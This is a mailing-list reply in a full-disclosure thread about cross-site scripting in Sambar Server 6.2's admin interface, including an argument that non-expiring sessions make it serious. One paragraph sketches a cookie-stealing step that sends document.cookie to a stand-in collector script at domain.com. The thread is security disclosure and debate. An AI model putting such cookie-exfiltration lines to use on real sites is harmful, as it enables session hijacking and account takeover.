Re: [Full-disclosure] XSS in Sambar Server version 6.2

"A user can input a specially crafted script that when rendered by the
application..."

Hopefully you can explain:

"Multiple XSS found in the administrative interface."

>>  This kind of pre-supposes the idea that a user has access to the
>> administrative interface.  The tests I ran were purely looking at what
>> somebody with priviliged rights could have effected within the application.
>> For clarification, a user is by default somebody who is "identified" and
>> then "authorised" to the system.  In the case of Sambar Server version 6.2
>> this is done through the mandatory access control of username and password.
>> The system in this case is the "administrative interface".

Granted, the XSS is a very low level vulnerability.  However, combine the XSS
with the ability to (document.cookie) and a
document.location="http://domain.com/cookiecollector.pl"; which logs the users
cookie then this becomes more of an issue.  Incidentally, did you know the
application does not expire session states, i.e., if I log off or kill my
session with the browser or otherwise and a miscreant (somebody who uses a Lynx
browser) , e.g., You, conspires to obtain my user identity - in this case we're
using the example of the cookie - then certainly this issue certainly becomes
one of a high level issue.

>From personal experience I know you've run across plenty of XSS issues before,
>we've both discussed where we've collided in previous job roles.  I guess, in
>a nut shell it shows how little input/output validation is occuring throughout
>the application and what a user if so inclined, can force the application into
>rendering.  But really, I used to point out input/output validation issues to
>you along with the other stuff you used to miss in your web application pen
>tests.

P.S. There'll be plenty of other issues (other than XSS) I'll publish re:
Sambar Server 6.2.  I haven't got a problem if you would like to work with me
in researching bugs/problems/issues.  It's just a matter of trying to work with
the vendor to help find understand the issues/apply a patch.  And btw, this
isn't a personal attack against you either =)